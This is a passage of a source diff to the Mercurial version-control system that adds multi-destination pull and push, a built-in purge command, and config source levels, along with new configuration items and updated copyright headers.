""" opts = pycompat.byteskwargs(opts) - hg.peer(ui, opts, ui.expandpath(dest), create=True) + path = urlutil.get_clone_path(ui, dest)[1] + peer = hg.peer(ui, opts, path, create=True) + peer.close() @command( @@ -4896,10 +4946,10 @@ + logopts + remoteopts + subrepoopts, - _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]'), + _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, ) -def outgoing(ui, repo, dest=None, **opts): +def outgoing(ui, repo, *dests, **opts): """show changesets not found in the destination Show changesets not found in the specified destination repository @@ -4935,47 +4985,24 @@ Returns 0 if there are outgoing changes, 1 otherwise. """ - # hg._outgoing() needs to re-resolve the path in order to handle #branch - # style URLs, so don't overwrite dest. - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - opts = pycompat.byteskwargs(opts) - if opts.get(b'graph'): - logcmdutil.checkunsupportedgraphflags([], opts) - o, other = hg._outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return - - revdag = logcmdutil.graphrevs(repo, o, opts) - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts, buffered=True) - logcmdutil.displaygraph( - ui, repo, revdag, displayer, graphmod.asciiedges - ) - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return 0 - if opts.get(b'bookmarks'): - dest = path.pushloc or path.loc - other = hg.peer(repo, opts, dest) - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - ui.pager(b'outgoing') - return bookmarks.outgoing(ui, repo, other) - - repo._subtoppath = path.pushloc or path.loc - try: - return hg.outgoing(ui, repo, dest, opts) - 
finally: - del repo._subtoppath + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + other = hg.peer(repo, opts, dest) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(dest) + ) + ui.pager(b'outgoing') + return bookmarks.outgoing(ui, repo, other) + finally: + other.close() + + return hg.outgoing(ui, repo, dests, opts) @command( @@ -5113,7 +5140,7 @@ fm = ui.formatter(b'paths', opts) if fm.isplain(): - hidepassword = util.hidepassword + hidepassword = urlutil.hidepassword else: hidepassword = bytes if ui.quiet: @@ -5244,9 +5271,11 @@ :optupdate: updating working directory is needed or not :checkout: update destination revision (or None to default destination) :brev: a name, which might be a bookmark to be activated after updating + + return True if update raise any conflict, False otherwise. """ if modheads == 0: - return + return False if optupdate: try: return hg.updatetotally(ui, repo, checkout, brev) @@ -5268,6 +5297,7 @@ ui.status(_(b"(run 'hg heads' to see heads)\n")) elif not ui.configbool(b'commands', b'update.requiredest'): ui.status(_(b"(run 'hg update' to get a working copy)\n")) + return False @command( @@ -5308,11 +5338,11 @@ ), ] + remoteopts, - _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]'), + _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def pull(ui, repo, source=b"default", **opts): +def pull(ui, repo, *sources, **opts): """pull changes from the specified source Pull changes from a remote repository to a local one. @@ -5336,6 +5366,10 @@ If SOURCE is omitted, the 'default' path will be used. See :hg:`help urls` for more information. + If multiple sources are specified, they will be pulled sequentially as if + the command was run multiple time. 
If --update is specify and the command + will stop at the first failed --update. + Specifying bookmark as ``.`` is equivalent to specifying the active bookmark's name. @@ -5350,101 +5384,211 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) - ui.flush() - other = hg.peer(repo, opts, source) - try: - revs, checkout = hg.addbranchrevs( - repo, other, branches, opts.get(b'rev') - ) - - pullopargs = {} - - nodes = None - if opts.get(b'bookmark') or revs: - # The list of bookmark used here is the same used to actually update - # the bookmark names, to avoid the race from issue 4689 and we do - # all lookup and bookmark queries in one go so they see the same - # version of the server state (issue 4700). - nodes = [] - fnodes = [] - revs = revs or [] - if revs and not other.capable(b'lookup'): - err = _( - b"other repository doesn't support revision lookup, " - b"so a rev cannot be specified." 
- ) - raise error.Abort(err) - with other.commandexecutor() as e: - fremotebookmarks = e.callcommand( - b'listkeys', {b'namespace': b'bookmarks'} - ) - for r in revs: - fnodes.append(e.callcommand(b'lookup', {b'key': r})) - remotebookmarks = fremotebookmarks.result() - remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) - pullopargs[b'remotebookmarks'] = remotebookmarks - for b in opts.get(b'bookmark', []): - b = repo._bookmarks.expandname(b) - if b not in remotebookmarks: - raise error.InputError( - _(b'remote bookmark %s not found!') % b + sources = urlutil.get_pull_paths(repo, ui, sources, opts.get(b'branch')) + for source, branches in sources: + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) + ui.flush() + other = hg.peer(repo, opts, source) + update_conflict = None + try: + revs, checkout = hg.addbranchrevs( + repo, other, branches, opts.get(b'rev') + ) + + pullopargs = {} + + nodes = None + if opts.get(b'bookmark') or revs: + # The list of bookmark used here is the same used to actually update + # the bookmark names, to avoid the race from issue 4689 and we do + # all lookup and bookmark queries in one go so they see the same + # version of the server state (issue 4700). + nodes = [] + fnodes = [] + revs = revs or [] + if revs and not other.capable(b'lookup'): + err = _( + b"other repository doesn't support revision lookup, " + b"so a rev cannot be specified." 
+ ) + raise error.Abort(err) + with other.commandexecutor() as e: + fremotebookmarks = e.callcommand( + b'listkeys', {b'namespace': b'bookmarks'} + ) + for r in revs: + fnodes.append(e.callcommand(b'lookup', {b'key': r})) + remotebookmarks = fremotebookmarks.result() + remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) + pullopargs[b'remotebookmarks'] = remotebookmarks + for b in opts.get(b'bookmark', []): + b = repo._bookmarks.expandname(b) + if b not in remotebookmarks: + raise error.InputError( + _(b'remote bookmark %s not found!') % b + ) + nodes.append(remotebookmarks[b]) + for i, rev in enumerate(revs): + node = fnodes[i].result() + nodes.append(node) + if rev == checkout: + checkout = node + + wlock = util.nullcontextmanager() + if opts.get(b'update'): + wlock = repo.wlock() + with wlock: + pullopargs.update(opts.get(b'opargs', {})) + modheads = exchange.pull( + repo, + other, + heads=nodes, + force=opts.get(b'force'), + bookmarks=opts.get(b'bookmark', ()), + opargs=pullopargs, + confirm=opts.get(b'confirm'), + ).cgresult + + # brev is a name, which might be a bookmark to be activated at + # the end of the update. In other words, it is an explicit + # destination of the update + brev = None + + if checkout: + checkout = repo.unfiltered().changelog.rev(checkout) + + # order below depends on implementation of + # hg.addbranchrevs(). opts['bookmark'] is ignored, + # because 'checkout' is determined without it. 
+ if opts.get(b'rev'): + brev = opts[b'rev'][0] + elif opts.get(b'branch'): + brev = opts[b'branch'][0] + else: + brev = branches[0] + repo._subtoppath = source + try: + update_conflict = postincoming( + ui, repo, modheads, opts.get(b'update'), checkout, brev ) - nodes.append(remotebookmarks[b]) - for i, rev in enumerate(revs): - node = fnodes[i].result() - nodes.append(node) - if rev == checkout: - checkout = node - - wlock = util.nullcontextmanager() - if opts.get(b'update'): - wlock = repo.wlock() - with wlock: - pullopargs.update(opts.get(b'opargs', {})) - modheads = exchange.pull( - repo, - other, - heads=nodes, - force=opts.get(b'force'), - bookmarks=opts.get(b'bookmark', ()), - opargs=pullopargs, - confirm=opts.get(b'confirm'), - ).cgresult - - # brev is a name, which might be a bookmark to be activated at - # the end of the update. In other words, it is an explicit - # destination of the update - brev = None - - if checkout: - checkout = repo.unfiltered().changelog.rev(checkout) - - # order below depends on implementation of - # hg.addbranchrevs(). opts['bookmark'] is ignored, - # because 'checkout' is determined without it. - if opts.get(b'rev'): - brev = opts[b'rev'][0] - elif opts.get(b'branch'): - brev = opts[b'branch'][0] - else: - brev = branches[0] - repo._subtoppath = source - try: - ret = postincoming( - ui, repo, modheads, opts.get(b'update'), checkout, brev - ) - except error.FilteredRepoLookupError as exc: - msg = _(b'cannot update to target: %s') % exc.args[0] - exc.args = (msg,) + exc.args[1:] - raise - finally: - del repo._subtoppath - - finally: - other.close() - return ret + except error.FilteredRepoLookupError as exc: + msg = _(b'cannot update to target: %s') % exc.args[0] + exc.args = (msg,) + exc.args[1:] + raise + finally: + del repo._subtoppath + + finally: + other.close() + # skip the remaining pull source if they are some conflict. 
+ if update_conflict: + break + if update_conflict: + return 1 + else: + return 0 + + +@command( + b'purge|clean', + [ + (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), + (b'', b'all', None, _(b'purge ignored files too')), + (b'i', b'ignored', None, _(b'purge only ignored files')), + (b'', b'dirs', None, _(b'purge empty directories')), + (b'', b'files', None, _(b'purge files')), + (b'p', b'print', None, _(b'print filenames instead of deleting them')), + ( + b'0', + b'print0', + None, + _( + b'end filenames with NUL, for use with xargs' + b' (implies -p/--print)' + ), + ), + (b'', b'confirm', None, _(b'ask before permanently deleting files')), + ] + + cmdutil.walkopts, + _(b'hg purge [OPTION]... [DIR]...'), + helpcategory=command.CATEGORY_WORKING_DIRECTORY, +) +def purge(ui, repo, *dirs, **opts): + """removes files not tracked by Mercurial + + Delete files not known to Mercurial. This is useful to test local + and uncommitted changes in an otherwise-clean source tree. + + This means that purge will delete the following by default: + + - Unknown files: files marked with "?" by :hg:`status` + - Empty directories: in fact Mercurial ignores directories unless + they contain files under source control management + + But it will leave untouched: + + - Modified and unmodified tracked files + - Ignored files (unless -i or --all is specified) + - New files added to the repository (with :hg:`add`) + + The --files and --dirs options can be used to direct purge to delete + only files, only directories, or both. If neither option is given, + both will be deleted. + + If directories are given on the command line, only files in these + directories are considered. + + Be careful with purge, as you could irreversibly delete some files + you forgot to add to the repository. If you only want to print the + list of files that this program would delete, use the --print + option. 
+ """ + opts = pycompat.byteskwargs(opts) + cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') + + act = not opts.get(b'print') + eol = b'\n' + if opts.get(b'print0'): + eol = b'\0' + act = False # --print0 implies --print + if opts.get(b'all', False): + ignored = True + unknown = True + else: + ignored = opts.get(b'ignored', False) + unknown = not ignored + + removefiles = opts.get(b'files') + removedirs = opts.get(b'dirs') + confirm = opts.get(b'confirm') + if confirm is None: + try: + extensions.find(b'purge') + confirm = False + except KeyError: + confirm = True + + if not removefiles and not removedirs: + removefiles = True + removedirs = True + + match = scmutil.match(repo[None], dirs, opts) + + paths = mergemod.purge( + repo, + match, + unknown=unknown, + ignored=ignored, + removeemptydirs=removedirs, + removefiles=removefiles, + abortonerror=opts.get(b'abort_on_err'), + noop=not act, + confirm=confirm, + ) + + for path in paths: + if not act: + ui.write(b'%s%s' % (path, eol)) @command( @@ -5482,11 +5626,11 @@ ), ] + remoteopts, - _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]'), + _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def push(ui, repo, dest=None, **opts): +def push(ui, repo, *dests, **opts): """push changes to the specified destination Push changesets from the local repository to the specified @@ -5522,6 +5666,9 @@ Please see :hg:`help urls` for important details about ``ssh://`` URLs. If DESTINATION is omitted, a default path will be used. + When passed multiple destinations, push will process them one after the + other, but stop should an error occur. + .. 
container:: verbose The --pushvars option sends strings to the server that become @@ -5566,75 +5713,89 @@ # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) - revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev')) - other = hg.peer(repo, opts, dest) - - if revs: - revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] - if not revs: - raise error.InputError( - _(b"specified revisions evaluate to an empty set"), - hint=_(b"use different revision arguments"), - ) - elif path.pushrev: - # It doesn't make any sense to specify ancestor revisions. So limit - # to DAG heads to make discovery simpler. 
- expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) - revs = scmutil.revrange(repo, [expr]) - revs = [repo[rev].node() for rev in revs] - if not revs: - raise error.InputError( - _(b'default push revset for path evaluates to an empty set') - ) - elif ui.configbool(b'commands', b'push.require-revs'): - raise error.InputError( - _(b'no revisions specified to push'), - hint=_(b'did you mean "hg push -r ."?'), + some_pushed = False + result = 0 + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + branches = (path.branch, opts.get(b'branch') or []) + ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) + revs, checkout = hg.addbranchrevs( + repo, repo, branches, opts.get(b'rev') ) - - repo._subtoppath = dest - try: - # push subrepos depth-first for coherent ordering - c = repo[b'.'] - subs = c.substate # only repos that are committed - for s in sorted(subs): - result = c.sub(s).push(opts) - if result == 0: - return not result - finally: - del repo._subtoppath - - opargs = dict(opts.get(b'opargs', {})) # copy opargs since we may mutate it - opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) - - pushop = exchange.push( - repo, - other, - opts.get(b'force'), - revs=revs, - newbranch=opts.get(b'new_branch'), - bookmarks=opts.get(b'bookmark', ()), - publish=opts.get(b'publish'), - opargs=opargs, - ) - - result = not pushop.cgresult - - if pushop.bkresult is not None: - if pushop.bkresult == 2: - result = 2 - elif not result and pushop.bkresult: - result = 2 - + other = hg.peer(repo, opts, dest) + + try: + if revs: + revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] + if not revs: + raise error.InputError( + _(b"specified revisions evaluate to an empty set"), + hint=_(b"use different revision arguments"), + ) + elif path.pushrev: + # It doesn't make any sense to specify ancestor revisions. So limit + # to DAG heads to make discovery simpler. 
+ expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) + revs = scmutil.revrange(repo, [expr]) + revs = [repo[rev].node() for rev in revs] + if not revs: + raise error.InputError( + _( + b'default push revset for path evaluates to an empty set' + ) + ) + elif ui.configbool(b'commands', b'push.require-revs'): + raise error.InputError( + _(b'no revisions specified to push'), + hint=_(b'did you mean "hg push -r ."?'), + ) + + repo._subtoppath = dest + try: + # push subrepos depth-first for coherent ordering + c = repo[b'.'] + subs = c.substate # only repos that are committed + for s in sorted(subs): + sub_result = c.sub(s).push(opts) + if sub_result == 0: + return 1 + finally: + del repo._subtoppath + + opargs = dict( + opts.get(b'opargs', {}) + ) # copy opargs since we may mutate it + opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) + + pushop = exchange.push( + repo, + other, + opts.get(b'force'), + revs=revs, + newbranch=opts.get(b'new_branch'), + bookmarks=opts.get(b'bookmark', ()), + publish=opts.get(b'publish'), + opargs=opargs, + ) + + if pushop.cgresult == 0: + result = 1 + elif pushop.cgresult is not None: + some_pushed = True + + if pushop.bkresult is not None: + if pushop.bkresult == 2: + result = 2 + elif not result and pushop.bkresult: + result = 2 + + if result: + break + + finally: + other.close() + if result == 0 and not some_pushed: + result = 1 return result @@ -5740,6 +5901,7 @@ @command( b'rename|move|mv', [ + (b'', b'forget', None, _(b'unmark a destination file as renamed')), (b'A', b'after', None, _(b'record a rename that has already occurred')), ( b'', @@ -5771,8 +5933,13 @@ exist in the working directory. If invoked with -A/--after, the operation is recorded, but no copying is performed. - This command takes effect at the next commit. To undo a rename - before that, see :hg:`revert`. + To undo marking a destination file as renamed, use --forget. 
With that + option, all given (positional) arguments are unmarked as renames. The + destination file(s) will be left in place (still tracked). The source + file(s) will not be restored. Note that :hg:`rename --forget` behaves + the same way as :hg:`copy --forget`. + + This command takes effect with the next commit by default. Returns 0 on success, 1 if errors are encountered. """ @@ -6083,7 +6250,7 @@ if hint: ui.warn(hint) - unresolvedf = list(ms.unresolved()) + unresolvedf = ms.unresolvedcount() if not unresolvedf: ui.status(_(b'(no more unresolved files)\n')) cmdutil.checkafterresolved(repo) @@ -7043,7 +7210,12 @@ return def getincoming(): - source, branches = hg.parseurl(ui.expandpath(b'default')) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. + source, branches = urlutil.get_unique_pull_path( + b'summary', repo, ui, b'default' + ) sbranch = branches[0] try: other = hg.peer(repo, {}, source) @@ -7054,7 +7226,7 @@ revs, checkout = hg.addbranchrevs(repo, other, branches, None) if revs: revs = [other.lookup(rev) for rev in revs] - ui.debug(b'comparing with %s\n' % util.hidepassword(source)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source)) repo.ui.pushbuffer() commoninc = discovery.findcommonincoming(repo, other, heads=revs) repo.ui.popbuffer() @@ -7066,9 +7238,22 @@ source = sbranch = sother = commoninc = incoming = None def getoutgoing(): - dest, branches = hg.parseurl(ui.expandpath(b'default-push', b'default')) - dbranch = branches[0] - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. 
+ d = None + if b'default-push' in ui.paths: + d = b'default-push' + elif b'default' in ui.paths: + d = b'default' + if d is not None: + path = urlutil.get_unique_push_path(b'summary', repo, ui, d) + dest = path.pushloc or path.loc + dbranch = path.branch + else: + dest = b'default' + dbranch = None + revs, checkout = hg.addbranchrevs(repo, repo, (dbranch, []), None) if source != dest: try: dother = hg.peer(repo, {}, dest) @@ -7076,7 +7261,7 @@ if opts.get(b'remote'): raise return dest, dbranch, None, None - ui.debug(b'comparing with %s\n' % util.hidepassword(dest)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest)) elif sother is None: # there is no explicit destination peer, but source one is invalid return dest, dbranch, None, None @@ -7101,6 +7286,12 @@ dest = dbranch = dother = outgoing = None if opts.get(b'remote'): + # Help pytype. --remote sets both `needsincoming` and `needsoutgoing`. + # The former always sets `sother` (or raises an exception if it can't); + # the latter always sets `outgoing`. + assert sother is not None + assert outgoing is not None + t = [] if incoming: t.append(_(b'1 or more incoming')) @@ -7412,7 +7603,7 @@ try: txnname = b'unbundle' if not isinstance(gen, bundle2.unbundle20): - txnname = b'unbundle\n%s' % util.hidepassword(url) + txnname = b'unbundle\n%s' % urlutil.hidepassword(url) with repo.transaction(txnname) as tr: op = bundle2.applybundle( repo, gen, tr, source=b'unbundle', url=url @@ -7428,7 +7619,10 @@ ) modheads = bundle2.combinechangegroupresults(op) - return postincoming(ui, repo, modheads, opts.get('update'), None, None) + if postincoming(ui, repo, modheads, opts.get('update'), None, None): + return 1 + else: + return 0 @command( @@ -7708,7 +7902,7 @@ ) license = _( b"(see https://mercurial-scm.org for more information)\n" - b"\nCopyright (C) 2005-2021 Matt Mackall and others\n" + b"\nCopyright (C) 2005-2021 Olivia Mackall and others\n" b"This is free software; see the source for copying conditions. 
" b"There is NO\nwarranty; " b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" diff --git a/mercurial/commandserver.py b/mercurial/commandserver.py --- a/mercurial/commandserver.py +++ b/mercurial/commandserver.py @@ -1,6 +1,6 @@ # commandserver.py - communicate with Mercurial's API over a pipe # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -96,6 +96,10 @@ ctx.date(), extra, ) + rev = repo[n].rev() + if oldtip != repo.changelog.tiprev(): + repo.register_changeset(rev, repo.changelog.changelogrevision(rev)) + xp1, xp2 = p1.hex(), p2 and p2.hex() or b'' repo.hook( b'pretxncommit', @@ -108,7 +112,7 @@ targetphase = subrepoutil.newcommitphase(repo.ui, ctx) # prevent unmarking changesets as public on recommit - waspublic = oldtip == repo.changelog.tiprev() and not repo[n].phase() + waspublic = oldtip == repo.changelog.tiprev() and not repo[rev].phase() if targetphase and not waspublic: # retract boundary do not alter parent changeset. @@ -116,7 +120,7 @@ # be compliant anyway # # if minimal phase was 0 we don't need to retract anything - phases.registernew(repo, tr, targetphase, [repo[n].rev()]) + phases.registernew(repo, tr, targetphase, [rev]) return n @@ -357,6 +361,8 @@ elif fparent2 != nullid: if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other': fparent1, fparent2 = fparent2, nullid + elif ms.active() and ms.extras(fname).get(b'merged') != b'yes': + fparent1, fparent2 = fparent1, nullid # is one parent an ancestor of the other? 
else: fparentancestors = flog.commonancestorsheads(fparent1, fparent2) diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -1,6 +1,6 @@ # config.py - configuration parsing for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -22,14 +22,19 @@ class config(object): def __init__(self, data=None): + self._current_source_level = 0 self._data = {} self._unset = [] if data: for k in data._data: self._data[k] = data[k].copy() - self._source = data._source.copy() - else: - self._source = util.cowdict() + self._current_source_level = data._current_source_level + 1 + + def new_source(self): + """increment the source counter + + This is used to define source priority when reading""" + self._current_source_level += 1 def copy(self): return config(self) @@ -48,45 +53,66 @@ yield d def update(self, src): - self._source = self._source.preparewrite() + current_level = self._current_source_level + current_level += 1 + max_level = self._current_source_level for s, n in src._unset: ds = self._data.get(s, None) if ds is not None and n in ds: self._data[s] = ds.preparewrite() del self._data[s][n] - del self._source[(s, n)] for s in src: ds = self._data.get(s, None) if ds: self._data[s] = ds.preparewrite() else: self._data[s] = util.cowsortdict() - self._data[s].update(src._data[s]) - self._source.update(src._source) + for k, v in src._data[s].items(): + value, source, level = v + level += current_level + max_level = max(level, current_level) + self._data[s][k] = (value, source, level) + self._current_source_level = max_level + + def _get(self, section, item): + return self._data.get(section, {}).get(item) def get(self, section, item, default=None): - return self._data.get(section, {}).get(item, default) + 
result = self._get(section, item) + if result is None: + return default + return result[0] - def backup(self, section, item): + def backup(self, section, key): """return a tuple allowing restore to reinstall a previous value The main reason we need it is because it handles the "no data" case. """ try: - value = self._data[section][item] - source = self.source(section, item) - return (section, item, value, source) + item = self._data[section][key] except KeyError: - return (section, item) + return (section, key) + else: + return (section, key) + item def source(self, section, item): - return self._source.get((section, item), b"") + result = self._get(section, item) + if result is None: + return b"" + return result[1] + + def level(self, section, item): + result = self._get(section, item) + if result is None: + return None + return result[2] def sections(self): return sorted(self._data.keys()) def items(self, section): - return list(pycompat.iteritems(self._data.get(section, {}))) + items = pycompat.iteritems(self._data.get(section, {})) + return [(k, v[0]) for (k, v) in items] def set(self, section, item, value, source=b""): if pycompat.ispy3: @@ -103,26 +129,31 @@ self._data[section] = util.cowsortdict() else: self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - if source: - self._source = self._source.preparewrite() - self._source[(section, item)] = source + self._data[section][item] = (value, source, self._current_source_level) + + def alter(self, section, key, new_value): + """alter a value without altering its source or level + + This method is meant to be used by `ui.fixconfig` only.""" + item = self._data[section][key] + size = len(item) + new_item = (new_value,) + item[1:] + assert len(new_item) == size + self._data[section][key] = new_item def restore(self, data): """restore data returned by self.backup""" - self._source = self._source.preparewrite() - if len(data) == 4: + if len(data) != 2: # restore old data - 
section, item, value, source = data + section, key = data[:2] + item = data[2:] self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - self._source[(section, item)] = source + self._data[section][key] = item else: # no data before, remove everything section, item = data if section in self._data: self._data[section].pop(item, None) - self._source.pop((section, item), None) def parse(self, src, data, sections=None, remap=None, include=None): sectionre = util.re.compile(br'\[([^\[]+)\]') @@ -206,6 +237,7 @@ raise error.ConfigError(message, (b"%s:%d" % (src, line))) def read(self, path, fp=None, sections=None, remap=None): + self.new_source() if not fp: fp = util.posixfile(path, b'rb') assert ( @@ -220,6 +252,8 @@ def include(rel, remap, sections): abs = os.path.normpath(os.path.join(dir, rel)) self.read(abs, remap=remap, sections=sections) + # anything after the include has a higher level + self.new_source() self.parse( path, fp.read(), sections=sections, remap=remap, include=include diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -570,11 +570,21 @@ default=0, ) coreconfigitem( + b'convert', + b'svn.dangerous-set-commit-dates', + default=False, +) +coreconfigitem( b'debug', b'dirstate.delaywrite', default=0, ) coreconfigitem( + b'debug', + b'revlog.verifyposition.changelog', + default=b'', +) +coreconfigitem( b'defaults', b'.*', default=None, @@ -610,6 +620,12 @@ b'check-relroot', default=False, ) +# Track copy information for all file, not just "added" one (very slow) +coreconfigitem( + b'devel', + b'copy-tracing.trace-all-files', + default=False, +) coreconfigitem( b'devel', b'default-date', @@ -689,6 +705,11 @@ ) coreconfigitem( b'devel', + b'copy-tracing.multi-thread', + default=True, +) +coreconfigitem( + b'devel', b'debug.extensions', default=False, ) @@ -716,6 +737,14 @@ b'discovery.grow-sample', default=True, ) +# When 
discovery.grow-sample.dynamic is True, the default, the sample size is +# adapted to the shape of the undecided set (it is set to the max of: +# <target-size>, len(roots(undecided)), len(heads(undecided) +coreconfigitem( + b'devel', + b'discovery.grow-sample.dynamic', + default=True, +) # discovery.grow-sample.rate control the rate at which the sample grow coreconfigitem( b'devel', @@ -729,8 +758,26 @@ b'discovery.randomize', default=True, ) +# Control the initial size of the discovery sample +coreconfigitem( + b'devel', + b'discovery.sample-size', + default=200, +) +# Control the initial size of the discovery for initial change +coreconfigitem( + b'devel', + b'discovery.sample-size.initial', + default=100, +) _registerdiffopts(section=b'diff') coreconfigitem( + b'diff', + b'merge', + default=False, + experimental=True, +) +coreconfigitem( b'email', b'bcc', default=None, @@ -827,6 +874,31 @@ ) coreconfigitem( b'experimental', + b'bundlecompthreads', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.bzip2', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.gzip', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.none', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.zstd', + default=None, +) +coreconfigitem( + b'experimental', b'changegroup3', default=False, ) @@ -1235,7 +1307,7 @@ coreconfigitem( b'format', b'revlog-compression', - default=lambda: [b'zlib'], + default=lambda: [b'zstd', b'zlib'], alias=[(b'experimental', b'format.compression')], ) coreconfigitem( @@ -1253,10 +1325,36 @@ b'usestore', default=True, ) + + +def _persistent_nodemap_default(): + """compute `use-persistent-nodemap` default value + + The feature is disabled unless a fast implementation is available. + """ + from . 
import policy + + return policy.importrust('revlog') is not None + + coreconfigitem( b'format', b'use-persistent-nodemap', + default=_persistent_nodemap_default, +) +# TODO needs to grow a docket file to at least store the last offset of the data +# file when rewriting sidedata. +# Will also need a way of dealing with garbage data if we allow rewriting +# *existing* sidedata. +# Exchange-wise, we will also need to do something more efficient than keeping +# references to the affected revlogs, especially memory-wise when rewriting +# sidedata. +# Also... compress the sidedata? (this should be coming very soon) +coreconfigitem( + b'format', + b'exp-revlogv2.2', default=False, + experimental=True, ) coreconfigitem( b'format', diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -1,6 +1,6 @@ # context.py - changeset and file context objects for mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -2599,6 +2599,7 @@ b'flags': flags, b'copied': copied, } + util.clearcachedproperty(self, b'_manifest') def filectx(self, path, filelog=None): return overlayworkingfilectx( @@ -2884,7 +2885,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "memctx._parents" is # explicitly initialized by the list, of which length is 2. 
- if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: @@ -2902,7 +2903,7 @@ return scmutil.status(modified, added, removed, [], [], [], []) def parents(self): - if self._parents[1].node() == nullid: + if self._parents[1].rev() == nullrev: return [self._parents[0]] return self._parents @@ -2999,7 +3000,7 @@ parents = [repo[p] for p in parents if p is not None] parents = parents[:] while len(parents) < 2: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) p1, p2 = self._parents = parents # sanity check to ensure that the reused manifest parents are @@ -3051,7 +3052,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "metadataonlyctx._parents" is # explicitly initialized by the list, of which length is 2. - if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1,7 +1,7 @@ # coding: utf8 # copies.py - copy detection for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -59,14 +59,13 @@ # Cases 1, 3, and 5 are then removed by _filter(). 
